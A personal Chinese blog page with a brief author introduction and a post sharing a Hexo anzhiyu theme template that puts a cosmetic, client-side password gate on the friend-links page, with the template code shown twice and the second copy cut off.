诗雨小栈

About:想要了解诗雨...

2026-05-11T16:00:00.000Z

今世我：

时代边缘的幸存者记录

哈～大家好呀！这里是是诗雨。

一只软软的、还在努力改变的可爱小女孩。

平时喜欢窝在房间里发呆、看日漫、听音乐、和可爱同类聊天～

表面安静，内心其实超级想被摸摸头、被夸夸的类型(´｡• ᵕ •｡`)

现在正在HRT的路上，每天都带着一点点期待和紧张在前进～梦想是能有一天自信地做自己！

性格有点小害羞，但遇到喜欢的人就会忍不住变成话痨猫猫，喜欢用表情包和“喵喵”表达心情。

欢迎来找我聊天！

另世我：

认真过好每一天！

这里是Mitunlny，可以叫我mitu。

正在学习网络安全和CTF，欢迎交流！

希望成为很厉害的大手子…ww

About

👨‍💻 My blog: http://czxh.top
📫 How to reach me: mitunlny@foxmail.com

Anzhiyu_Flink_Encrypt

2025-11-02T16:00:00.000Z

Anzhiyu_Flink_Encrypt - 基于anzhiyu主题实现友链页面加密功能

前言：为了反社工侦察，博主独创的友链加密功能，以防信息搜集者通过你的博客定位到你朋友的博客（bushi
s
（其实只是一个形式了
ps：本站友链密码：Q3liZXJTZWN1cml0eUAxMTQ1MTQ= 你不是来社工的对吧！👀

v1.1

更新内容：添加控制加密功能，可在_config.yml文件中设置encrypted_friends的参数来控制网站是否启用友链加密功能

- includes/page/flink.pug

//- includes/page/flink.pug//- 检查是否开启友链加密功能//- 逻辑：当 encrypted_friends 为 false 时关闭加密，否则需要 page.password 才加密- const encrypted_friends_setting = theme.encrypted_friends- const enableEncryption = encrypted_friends_setting !== false && page.passwordif enableEncryption  #hexo-blog-encrypt    .hbe-input-container      input(type="password" id="hbePass" placeholder=page.message || "请输入密码查看友链")      button(onclick="decryptFriends()") 解密查看    #hbeError(style="display:none;color:red;margin-top:10px;")= page.wrong_pass_message || '密码错误！'  #encrypted-content(style="display:none;")    #article-container      if theme.linkPageTop && theme.linkPageTop.enable        #flink-banners          .banner-top-box            .flink-banners-title              .banners-title-small 友情链接              .banners-title-big=theme.linkPageTop ? theme.linkPageTop.title : "与数百名博主无限进步"            .banner-button-group              if (theme.friends_vue.apiurl)                a.banner-button.secondary.no-text-decoration(onclick="friendChainRandomTransmission()")                  i.anzhiyufont.anzhiyu-icon-paper-plane1                  span.banner-button-text 随机访问              if theme.linkPageTop.addFriendPlaceholder && theme.comments.use == 'Twikoo' && theme.twikoo.envId                a.banner-button.no-text-decoration(onclick="anzhiyu.addFriendLink()")                  i.anzhiyufont.anzhiyu-icon-arrow-circle-right                  span.banner-button-text 申请友链          #skills-tags-group-all            .tags-group-wrapper              - function getAvatarWithoutExclamationMark(url) {              -   const index = url.indexOf('!');              -   return index !== -1 ? url.substring(0, index) : url;              - }              each y in [1,2]                each i, index in site.data.link.slice(0, 15)                  - const link_list = i.link_list.slice()                  - const hundredSuffix = i.hundredSuffix ? i.hundredSuffix : ""                  - const evenNum = link_list.filter((x, index) => index % 2 === 0);                  - const oddNum = link_list.filter((x, index) => index % 2 === 1);                  each item, index2 in link_list.slice(0, Math.min(evenNum.length, oddNum.length))                    - const index = index2 * 2                    if (index <= 15 && typeof evenNum[index] !== 'undefined' && typeof oddNum[index] !== 'undefined')                      - let oddNumAvatar = getAvatarWithoutExclamationMark(oddNum[index].avatar);                      - let evenNumAvatar = getAvatarWithoutExclamationMark(evenNum[index].avatar);                      .tags-group-icon-pair                        a.tags-group-icon.no-text-decoration(href=url_for(evenNum[index].link), title=evenNum[index].name)                          img.no-lightbox(title=evenNum[index].name, src=url_for(evenNumAvatar + hundredSuffix) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=evenNum[index].name)                        a.tags-group-icon.no-text-decoration(href=url_for(oddNum[index].link), title=oddNum[index].name)                          img.no-lightbox(title=oddNum[index].name, src=url_for(oddNumAvatar + hundredSuffix) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=oddNum[index].name)      if theme.friends_vue && theme.friends_vue.enable        .title-h2-a          .title-h2-a-left            h2(style='padding-top:0;margin:.6rem 0 .6rem') 🎣 钓鱼            a.random-post-start.no-text-decoration(href='javascript:fetchRandomPost();')              i.anzhiyufont.anzhiyu-icon-arrow-rotate-right          .title-h2-a-right            a.random-post-all.no-text-decoration(href='/link/') 全部友链        #random-post        script(defer data-pjax src=url_for(theme.asset.random_friends_post_js))            .flink        if site.data.link          each i in site.data.link            if i.class_name              h2!= i.class_name + "(" + i.link_list.length + ")"            if i.class_desc              .flink-desc!=i.class_desc            if i.flink_style === 'anzhiyu'              div(class=i.lost_contact ? 'anzhiyu-flink-list cf-friends-lost-contact' : 'anzhiyu-flink-list')                if i.link_list                  each item in i.link_list                    - let color = item.color || ""                    - let tag = item.tag || ""                                        .flink-list-item                      if color == "vip" && tag                        span.site-card-tag.vip #[=tag]                          i.light                      else if color == "speed" && tag                        span.site-card-tag.speed #[=tag]                      else if tag                        span.site-card-tag(style=`background-color: ${color}`) #[=tag]                      else if item.recommend                        span.site-card-tag 荐                      if i.lost_contact                        a.cf-friends-link(href=url_for(item.link) title=item.name target="_blank")                          if theme.lazyload.enable                            img.no-lightbox(data-lazy-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                          else                            img.cf-friends-avatar.no-lightbox(src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                          .flink-item-info                            .flink-item-name.cf-friends-name-lost-contact= item.name                      else                        a.cf-friends-link(href=url_for(item.link) cf-href=url_for(item.link) title=item.name target="_blank")                          if theme.lazyload.enable                            img.cf-friends-avatar.no-lightbox(data-lazy-src=url_for(item.avatar), cf-src=url_for(item.avatar), onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                          else                            img.cf-friends-avatar.no-lightbox(src=url_for(item.avatar) cf-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                          .flink-item-info                            .flink-item-name.cf-friends-name= item.name                            .flink-item-desc(title=item.descr)= item.descr                        else if i.flink_style === 'telescopic'              .telescopic-site-card-group                each item in i.link_list                  - let color = item.color || ""                  - let tag = item.tag || ""                  - let siteshot = item.siteshot || `https://image.thum.io/get/width/400/crop/800/allowJPG/wait/20/noanimate/${item.link}` || theme.default_img                  .site-card                    if color == "vip" && tag                      span.site-card-tag.vip #[=tag]                        i.light                    else if color == "speed" && tag                      span.site-card-tag.speed #[=tag]                    else if tag                      span.site-card-tag(style=`background-color: ${color}`) #[=tag]                    else if item.recommend                      span.site-card-tag 荐                    a.img.no-text-decoration(target='_blank', title=`${item.name}`, href=`${item.link}`, rel='external nofollow')                      img.flink-avatar(data-lazy-src=siteshot, onerror=`this.onerror=null;this.src='${theme.default_img}'`, alt=item.name, style="pointer-events: none;", src=`${siteshot}`)                    a.info.cf-friends-link.no-text-decoration(target='_blank', title=`${item.name}`, href=`${item.link}`, cf-href=url_for(item.link), rel='external nofollow')                      .site-card-avatar                        img.flink-avatar.cf-friends-avatar.no-fancybox(data-lazy-src=item.avatar, cf-src=url_for(item.avatar), onerror=`this.onerror=null;this.src='${theme.default_img}'`, alt=item.name, src=item.avatar)                      .site-card-text                        span.title.cf-friends-name #[=item.name]                        span.desc(title=`${item.descr}`) #[=item.descr]            else if i.flink_style === 'flexcard'              .flexcard-flink-list                each item in i.link_list                  a.flink-list-card.cf-friends-link(href=url_for(item.link) cf-href=url_for(item.link) target='_blank' data-title=item.descr)                    .wrapper.cover                      - var siteshot = item.siteshot ? url_for(item.siteshot) : 'https://image.thum.io/get/width/400/crop/800/allowJPG/wait/20/noanimate/' + item.link                      if theme.lazyload.enable                        img.cover.fadeIn(data-lazy-src=siteshot onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.post_page) + `'` alt='cover' )                      else                        img.cover.fadeIn(src=siteshot onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.post_page) + `'` alt='cover' )                        .info                      if theme.lazyload.enable                        img.cf-friends-avatar.no-lightbox.flink-avatar(data-lazy-src=url_for(item.avatar) cf-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt='cover' )                      else                        img.cf-friends-avatar.no-lightbox(src=url_for(item.avatar) cf-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt='cover' )                      span.flink-sitename.cf-friends-name= item.name      != page.contentelse  //- 非加密模式：直接显示内容  #article-container    if theme.linkPageTop && theme.linkPageTop.enable      #flink-banners        .banner-top-box          .flink-banners-title            .banners-title-small 友情链接            .banners-title-big=theme.linkPageTop ? theme.linkPageTop.title : "与数百名博主无限进步"          .banner-button-group            if (theme.friends_vue.apiurl)              a.banner-button.secondary.no-text-decoration(onclick="friendChainRandomTransmission()")                i.anzhiyufont.anzhiyu-icon-paper-plane1                span.banner-button-text 随机访问            if theme.linkPageTop.addFriendPlaceholder && theme.comments.use == 'Twikoo' && theme.twikoo.envId              a.banner-button.no-text-decoration(onclick="anzhiyu.addFriendLink()")                i.anzhiyufont.anzhiyu-icon-arrow-circle-right                span.banner-button-text 申请友链        #skills-tags-group-all          .tags-group-wrapper            - function getAvatarWithoutExclamationMark(url) {            -   const index = url.indexOf('!');            -   return index !== -1 ? url.substring(0, index) : url;            - }            each y in [1,2]              each i, index in site.data.link.slice(0, 15)                - const link_list = i.link_list.slice()                - const hundredSuffix = i.hundredSuffix ? i.hundredSuffix : ""                - const evenNum = link_list.filter((x, index) => index % 2 === 0);                - const oddNum = link_list.filter((x, index) => index % 2 === 1);                each item, index2 in link_list.slice(0, Math.min(evenNum.length, oddNum.length))                  - const index = index2 * 2                  if (index <= 15 && typeof evenNum[index] !== 'undefined' && typeof oddNum[index] !== 'undefined')                    - let oddNumAvatar = getAvatarWithoutExclamationMark(oddNum[index].avatar);                    - let evenNumAvatar = getAvatarWithoutExclamationMark(evenNum[index].avatar);                    .tags-group-icon-pair                      a.tags-group-icon.no-text-decoration(href=url_for(evenNum[index].link), title=evenNum[index].name)                        img.no-lightbox(title=evenNum[index].name, src=url_for(evenNumAvatar + hundredSuffix) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=evenNum[index].name)                      a.tags-group-icon.no-text-decoration(href=url_for(oddNum[index].link), title=oddNum[index].name)                        img.no-lightbox(title=oddNum[index].name, src=url_for(oddNumAvatar + hundredSuffix) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=oddNum[index].name)    if theme.friends_vue && theme.friends_vue.enable      .title-h2-a        .title-h2-a-left          h2(style='padding-top:0;margin:.6rem 0 .6rem') 🎣 钓鱼          a.random-post-start.no-text-decoration(href='javascript:fetchRandomPost();')            i.anzhiyufont.anzhiyu-icon-arrow-rotate-right        .title-h2-a-right          a.random-post-all.no-text-decoration(href='/link/') 全部友链      #random-post      script(defer data-pjax src=url_for(theme.asset.random_friends_post_js))        .flink      if site.data.link        each i in site.data.link          if i.class_name            h2!= i.class_name + "(" + i.link_list.length + ")"          if i.class_desc            .flink-desc!=i.class_desc          if i.flink_style === 'anzhiyu'            div(class=i.lost_contact ? 'anzhiyu-flink-list cf-friends-lost-contact' : 'anzhiyu-flink-list')              if i.link_list                each item in i.link_list                  - let color = item.color || ""                  - let tag = item.tag || ""                                    .flink-list-item                    if color == "vip" && tag                      span.site-card-tag.vip #[=tag]                        i.light                    else if color == "speed" && tag                      span.site-card-tag.speed #[=tag]                    else if tag                      span.site-card-tag(style=`background-color: ${color}`) #[=tag]                    else if item.recommend                      span.site-card-tag 荐                    if i.lost_contact                      a.cf-friends-link(href=url_for(item.link) title=item.name target="_blank")                        if theme.lazyload.enable                          img.no-lightbox(data-lazy-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                        else                          img.cf-friends-avatar.no-lightbox(src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                        .flink-item-info                          .flink-item-name.cf-friends-name-lost-contact= item.name                    else                      a.cf-friends-link(href=url_for(item.link) cf-href=url_for(item.link) title=item.name target="_blank")                        if theme.lazyload.enable                          img.cf-friends-avatar.no-lightbox(data-lazy-src=url_for(item.avatar), cf-src=url_for(item.avatar), onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                        else                          img.cf-friends-avatar.no-lightbox(src=url_for(item.avatar) cf-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                        .flink-item-info                          .flink-item-name.cf-friends-name= item.name                          .flink-item-desc(title=item.descr)= item.descr                    else if i.flink_style === 'telescopic'            .telescopic-site-card-group              each item in i.link_list                - let color = item.color || ""                - let tag = item.tag || ""                - let siteshot = item.siteshot || `https://image.thum.io/get/width/400/crop/800/allowJPG/wait/20/noanimate/${item.link}` || theme.default_img                .site-card                  if color == "vip" && tag                    span.site-card-tag.vip #[=tag]                      i.light                  else if color == "speed" && tag                    span.site-card-tag.speed #[=tag]                  else if tag                    span.site-card-tag(style=`background-color: ${color}`) #[=tag]                  else if item.recommend                    span.site-card-tag 荐                  a.img.no-text-decoration(target='_blank', title=`${item.name}`, href=`${item.link}`, rel='external nofollow')                    img.flink-avatar(data-lazy-src=siteshot, onerror=`this.onerror=null;this.src='${theme.default_img}'`, alt=item.name, style="pointer-events: none;", src=`${siteshot}`)                  a.info.cf-friends-link.no-text-decoration(target='_blank', title=`${item.name}`, href=`${item.link}`, cf-href=url_for(item.link), rel='external nofollow')                    .site-card-avatar                      img.flink-avatar.cf-friends-avatar.no-fancybox(data-lazy-src=item.avatar, cf-src=url_for(item.avatar), onerror=`this.onerror=null;this.src='${theme.default_img}'`, alt=item.name, src=item.avatar)                    .site-card-text                      span.title.cf-friends-name #[=item.name]                      span.desc(title=`${item.descr}`) #[=item.descr]          else if i.flink_style === 'flexcard'            .flexcard-flink-list              each item in i.link_list                a.flink-list-card.cf-friends-link(href=url_for(item.link) cf-href=url_for(item.link) target='_blank' data-title=item.descr)                  .wrapper.cover                    - var siteshot = item.siteshot ? url_for(item.siteshot) : 'https://image.thum.io/get/width/400/crop/800/allowJPG/wait/20/noanimate/' + item.link                    if theme.lazyload.enable                      img.cover.fadeIn(data-lazy-src=siteshot onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.post_page) + `'` alt='cover' )                    else                      img.cover.fadeIn(src=siteshot onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.post_page) + `'` alt='cover' )                      .info                    if theme.lazyload.enable                      img.cf-friends-avatar.no-lightbox.flink-avatar(data-lazy-src=url_for(item.avatar) cf-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt='cover' )                    else                      img.cf-friends-avatar.no-lightbox(src=url_for(item.avatar) cf-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt='cover' )                    span.flink-sitename.cf-friends-name= item.name    != page.content//- 只在启用加密功能时才加载JavaScriptif enableEncryption  script.    // 页面加载时立即检查加密状态    document.addEventListener('DOMContentLoaded', function() {      const encryptedContent = document.getElementById('encrypted-content');      const encryptContainer = document.getElementById('hexo-blog-encrypt');            // 强制显示加密界面，隐藏内容      if (encryptContainer) encryptContainer.style.display = 'block';      if (encryptedContent) encryptedContent.style.display = 'none';            // 检查保存的密码      const savedPass = localStorage.getItem('friends-page-pass');      const correctPass = '#{page.password}';            if (savedPass === correctPass) {        // 密码正确，显示内容        if (encryptedContent) encryptedContent.style.display = 'block';        if (encryptContainer) encryptContainer.style.display = 'none';      } else {        // 密码错误或未保存，清除可能存在的错误缓存        localStorage.removeItem('friends-page-pass');        if (encryptedContent) encryptedContent.style.display = 'none';        if (encryptContainer) encryptContainer.style.display = 'block';      }    });    function decryptFriends() {      const inputPass = document.getElementById('hbePass').value;      const correctPass = '#{page.password}';      const encryptedContent = document.getElementById('encrypted-content');      const errorElement = document.getElementById('hbeError');      const encryptContainer = document.getElementById('hexo-blog-encrypt');            if (inputPass === correctPass) {        encryptedContent.style.display = 'block';        encryptContainer.style.display = 'none';        errorElement.style.display = 'none';        // 保存密码        localStorage.setItem('friends-page-pass', inputPass);      } else {        errorElement.style.display = 'block';        // 清除错误的保存        localStorage.removeItem('friends-page-pass');      }    }

控制器配置：

在站点配置文件or主题配置文件中添加：

encrypted_friends: false

或者：

encrypted_friends: true

之后进行hexo三连；

v1.0

效果图

部署教程

前置：

部署好你的博客（本站使用的是基于hexo框架anzhiyu主题的部署）且配置好anzhiyu独有的友链页面

步骤：

找到\themes\anzhiyu\layout\includes\page\flink.pug文件，将其替换为以下内容：

//- includes/page/flink.pugif page.password  #hexo-blog-encrypt    .hbe-input-container      input(type="password" id="hbePass" placeholder=page.message || "请输入密码查看友链")      button(onclick="decryptFriends()") 解密查看    #hbeError(style="display:none;color:red;margin-top:10px;")= page.wrong_pass_message || '密码错误！'  #encrypted-content(style="display:none;")    #article-container      if theme.linkPageTop && theme.linkPageTop.enable        #flink-banners          .banner-top-box            .flink-banners-title              .banners-title-small 友情链接              .banners-title-big=theme.linkPageTop ? theme.linkPageTop.title : "与数百名博主无限进步"            .banner-button-group              if (theme.friends_vue.apiurl)                a.banner-button.secondary.no-text-decoration(onclick="friendChainRandomTransmission()")                  i.anzhiyufont.anzhiyu-icon-paper-plane1                  span.banner-button-text 随机访问              if theme.linkPageTop.addFriendPlaceholder && theme.comments.use == 'Twikoo' && theme.twikoo.envId                a.banner-button.no-text-decoration(onclick="anzhiyu.addFriendLink()")                  i.anzhiyufont.anzhiyu-icon-arrow-circle-right                  span.banner-button-text 申请友链          #skills-tags-group-all            .tags-group-wrapper              - function getAvatarWithoutExclamationMark(url) {              -   const index = url.indexOf('!');              -   return index !== -1 ? url.substring(0, index) : url;              - }              each y in [1,2]                each i, index in site.data.link.slice(0, 15)                  - const link_list = i.link_list.slice()                  - const hundredSuffix = i.hundredSuffix ? i.hundredSuffix : ""                  - const evenNum = link_list.filter((x, index) => index % 2 === 0);                  - const oddNum = link_list.filter((x, index) => index % 2 === 1);                  each item, index2 in link_list.slice(0, Math.min(evenNum.length, oddNum.length))                    - const index = index2 * 2                    if (index <= 15 && typeof evenNum[index] !== 'undefined' && typeof oddNum[index] !== 'undefined')                      - let oddNumAvatar = getAvatarWithoutExclamationMark(oddNum[index].avatar);                      - let evenNumAvatar = getAvatarWithoutExclamationMark(evenNum[index].avatar);                      .tags-group-icon-pair                        a.tags-group-icon.no-text-decoration(href=url_for(evenNum[index].link), title=evenNum[index].name)                          img.no-lightbox(title=evenNum[index].name, src=url_for(evenNumAvatar + hundredSuffix) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=evenNum[index].name)                        a.tags-group-icon.no-text-decoration(href=url_for(oddNum[index].link), title=oddNum[index].name)                          img.no-lightbox(title=oddNum[index].name, src=url_for(oddNumAvatar + hundredSuffix) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=oddNum[index].name)      if theme.friends_vue && theme.friends_vue.enable        .title-h2-a          .title-h2-a-left            h2(style='padding-top:0;margin:.6rem 0 .6rem') 🎣 钓鱼            a.random-post-start.no-text-decoration(href='javascript:fetchRandomPost();')              i.anzhiyufont.anzhiyu-icon-arrow-rotate-right          .title-h2-a-right            a.random-post-all.no-text-decoration(href='/link/') 全部友链        #random-post        script(defer data-pjax src=url_for(theme.asset.random_friends_post_js))            .flink        if site.data.link          each i in site.data.link            if i.class_name              h2!= i.class_name + "(" + i.link_list.length + ")"            if i.class_desc              .flink-desc!=i.class_desc            if i.flink_style === 'anzhiyu'              div(class=i.lost_contact ? 'anzhiyu-flink-list cf-friends-lost-contact' : 'anzhiyu-flink-list')                if i.link_list                  each item in i.link_list                    - let color = item.color || ""                    - let tag = item.tag || ""                                        .flink-list-item                      if color == "vip" && tag                        span.site-card-tag.vip #[=tag]                          i.light                      else if color == "speed" && tag                        span.site-card-tag.speed #[=tag]                      else if tag                        span.site-card-tag(style=`background-color: ${color}`) #[=tag]                      else if item.recommend                        span.site-card-tag 荐                      if i.lost_contact                        a.cf-friends-link(href=url_for(item.link) title=item.name target="_blank")                          if theme.lazyload.enable                            img.no-lightbox(data-lazy-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                          else                            img.cf-friends-avatar.no-lightbox(src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                          .flink-item-info                            .flink-item-name.cf-friends-name-lost-contact= item.name                      else                        a.cf-friends-link(href=url_for(item.link) cf-href=url_for(item.link) title=item.name target="_blank")                          if theme.lazyload.enable                            img.cf-friends-avatar.no-lightbox(data-lazy-src=url_for(item.avatar), cf-src=url_for(item.avatar), onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                          else                            img.cf-friends-avatar.no-lightbox(src=url_for(item.avatar) cf-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                          .flink-item-info                            .flink-item-name.cf-friends-name= item.name                            .flink-item-desc(title=item.descr)= item.descr                        else if i.flink_style === 'telescopic'              .telescopic-site-card-group                each item in i.link_list                  - let color = item.color || ""                  - let tag = item.tag || ""                  - let siteshot = item.siteshot || `https://image.thum.io/get/width/400/crop/800/allowJPG/wait/20/noanimate/${item.link}` || theme.default_img                  .site-card                    if color == "vip" && tag                      span.site-card-tag.vip #[=tag]                        i.light                    else if color == "speed" && tag                      span.site-card-tag.speed #[=tag]                    else if tag                      span.site-card-tag(style=`background-color: ${color}`) #[=tag]                    else if item.recommend                      span.site-card-tag 荐                    a.img.no-text-decoration(target='_blank', title=`${item.name}`, href=`${item.link}`, rel='external nofollow')                      img.flink-avatar(data-lazy-src=siteshot, onerror=`this.onerror=null;this.src='${theme.default_img}'`, alt=item.name, style="pointer-events: none;", src=`${siteshot}`)                    a.info.cf-friends-link.no-text-decoration(target='_blank', title=`${item.name}`, href=`${item.link}`, cf-href=url_for(item.link), rel='external nofollow')                      .site-card-avatar                        img.flink-avatar.cf-friends-avatar.no-fancybox(data-lazy-src=item.avatar, cf-src=url_for(item.avatar), onerror=`this.onerror=null;this.src='${theme.default_img}'`, alt=item.name, src=item.avatar)                      .site-card-text                        span.title.cf-friends-name #[=item.name]                        span.desc(title=`${item.descr}`) #[=item.descr]            else if i.flink_style === 'flexcard'              .flexcard-flink-list                each item in i.link_list                  a.flink-list-card.cf-friends-link(href=url_for(item.link) cf-href=url_for(item.link) target='_blank' data-title=item.descr)                    .wrapper.cover                      - var siteshot = item.siteshot ? url_for(item.siteshot) : 'https://image.thum.io/get/width/400/crop/800/allowJPG/wait/20/noanimate/' + item.link                      if theme.lazyload.enable                        img.cover.fadeIn(data-lazy-src=siteshot onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.post_page) + `'` alt='cover' )                      else                        img.cover.fadeIn(src=siteshot onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.post_page) + `'` alt='cover' )                        .info                      if theme.lazyload.enable                        img.cf-friends-avatar.no-lightbox.flink-avatar(data-lazy-src=url_for(item.avatar) cf-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt='cover' )                      else                        img.cf-friends-avatar.no-lightbox(src=url_for(item.avatar) cf-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt='cover' )                      span.flink-sitename.cf-friends-name= item.name      != page.contentelse  #article-container    if theme.linkPageTop && theme.linkPageTop.enable      #flink-banners        .banner-top-box          .flink-banners-title            .banners-title-small 友情链接            .banners-title-big=theme.linkPageTop ? theme.linkPageTop.title : "与数百名博主无限进步"          .banner-button-group            if (theme.friends_vue.apiurl)              a.banner-button.secondary.no-text-decoration(onclick="friendChainRandomTransmission()")                i.anzhiyufont.anzhiyu-icon-paper-plane1                span.banner-button-text 随机访问            if theme.linkPageTop.addFriendPlaceholder && theme.comments.use == 'Twikoo' && theme.twikoo.envId              a.banner-button.no-text-decoration(onclick="anzhiyu.addFriendLink()")                i.anzhiyufont.anzhiyu-icon-arrow-circle-right                span.banner-button-text 申请友链        #skills-tags-group-all          .tags-group-wrapper            - function getAvatarWithoutExclamationMark(url) {            -   const index = url.indexOf('!');            -   return index !== -1 ? url.substring(0, index) : url;            - }            each y in [1,2]              each i, index in site.data.link.slice(0, 15)                - const link_list = i.link_list.slice()                - const hundredSuffix = i.hundredSuffix ? i.hundredSuffix : ""                - const evenNum = link_list.filter((x, index) => index % 2 === 0);                - const oddNum = link_list.filter((x, index) => index % 2 === 1);                each item, index2 in link_list.slice(0, Math.min(evenNum.length, oddNum.length))                  - const index = index2 * 2                  if (index <= 15 && typeof evenNum[index] !== 'undefined' && typeof oddNum[index] !== 'undefined')                    - let oddNumAvatar = getAvatarWithoutExclamationMark(oddNum[index].avatar);                    - let evenNumAvatar = getAvatarWithoutExclamationMark(evenNum[index].avatar);                    .tags-group-icon-pair                      a.tags-group-icon.no-text-decoration(href=url_for(evenNum[index].link), title=evenNum[index].name)                        img.no-lightbox(title=evenNum[index].name, src=url_for(evenNumAvatar + hundredSuffix) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=evenNum[index].name)                      a.tags-group-icon.no-text-decoration(href=url_for(oddNum[index].link), title=oddNum[index].name)                        img.no-lightbox(title=oddNum[index].name, src=url_for(oddNumAvatar + hundredSuffix) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=oddNum[index].name)    if theme.friends_vue && theme.friends_vue.enable      .title-h2-a        .title-h2-a-left          h2(style='padding-top:0;margin:.6rem 0 .6rem') 🎣 钓鱼          a.random-post-start.no-text-decoration(href='javascript:fetchRandomPost();')            i.anzhiyufont.anzhiyu-icon-arrow-rotate-right        .title-h2-a-right          a.random-post-all.no-text-decoration(href='/link/') 全部友链      #random-post      script(defer data-pjax src=url_for(theme.asset.random_friends_post_js))        .flink      if site.data.link        each i in site.data.link          if i.class_name            h2!= i.class_name + "(" + i.link_list.length + ")"          if i.class_desc            .flink-desc!=i.class_desc          if i.flink_style === 'anzhiyu'            div(class=i.lost_contact ? 'anzhiyu-flink-list cf-friends-lost-contact' : 'anzhiyu-flink-list')              if i.link_list                each item in i.link_list                  - let color = item.color || ""                  - let tag = item.tag || ""                                    .flink-list-item                    if color == "vip" && tag                      span.site-card-tag.vip #[=tag]                        i.light                    else if color == "speed" && tag                      span.site-card-tag.speed #[=tag]                    else if tag                      span.site-card-tag(style=`background-color: ${color}`) #[=tag]                    else if item.recommend                      span.site-card-tag 荐                    if i.lost_contact                      a.cf-friends-link(href=url_for(item.link) title=item.name target="_blank")                        if theme.lazyload.enable                          img.no-lightbox(data-lazy-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                        else                          img.cf-friends-avatar.no-lightbox(src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                        .flink-item-info                          .flink-item-name.cf-friends-name-lost-contact= item.name                    else                      a.cf-friends-link(href=url_for(item.link) cf-href=url_for(item.link) title=item.name target="_blank")                        if theme.lazyload.enable                          img.cf-friends-avatar.no-lightbox(data-lazy-src=url_for(item.avatar), cf-src=url_for(item.avatar), onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                        else                          img.cf-friends-avatar.no-lightbox(src=url_for(item.avatar) cf-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt=item.name )                        .flink-item-info                          .flink-item-name.cf-friends-name= item.name                          .flink-item-desc(title=item.descr)= item.descr                    else if i.flink_style === 'telescopic'            .telescopic-site-card-group              each item in i.link_list                - let color = item.color || ""                - let tag = item.tag || ""                - let siteshot = item.siteshot || `https://image.thum.io/get/width/400/crop/800/allowJPG/wait/20/noanimate/${item.link}` || theme.default_img                .site-card                  if color == "vip" && tag                    span.site-card-tag.vip #[=tag]                      i.light                  else if color == "speed" && tag                    span.site-card-tag.speed #[=tag]                  else if tag                    span.site-card-tag(style=`background-color: ${color}`) #[=tag]                  else if item.recommend                    span.site-card-tag 荐                  a.img.no-text-decoration(target='_blank', title=`${item.name}`, href=`${item.link}`, rel='external nofollow')                    img.flink-avatar(data-lazy-src=siteshot, onerror=`this.onerror=null;this.src='${theme.default_img}'`, alt=item.name, style="pointer-events: none;", src=`${siteshot}`)                  a.info.cf-friends-link.no-text-decoration(target='_blank', title=`${item.name}`, href=`${item.link}`, cf-href=url_for(item.link), rel='external nofollow')                    .site-card-avatar                      img.flink-avatar.cf-friends-avatar.no-fancybox(data-lazy-src=item.avatar, cf-src=url_for(item.avatar), onerror=`this.onerror=null;this.src='${theme.default_img}'`, alt=item.name, src=item.avatar)                    .site-card-text                      span.title.cf-friends-name #[=item.name]                      span.desc(title=`${item.descr}`) #[=item.descr]          else if i.flink_style === 'flexcard'            .flexcard-flink-list              each item in i.link_list                a.flink-list-card.cf-friends-link(href=url_for(item.link) cf-href=url_for(item.link) target='_blank' data-title=item.descr)                  .wrapper.cover                    - var siteshot = item.siteshot ? url_for(item.siteshot) : 'https://image.thum.io/get/width/400/crop/800/allowJPG/wait/20/noanimate/' + item.link                    if theme.lazyload.enable                      img.cover.fadeIn(data-lazy-src=siteshot onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.post_page) + `'` alt='cover' )                    else                      img.cover.fadeIn(src=siteshot onerror=`this.onerror=null;this.src='` + 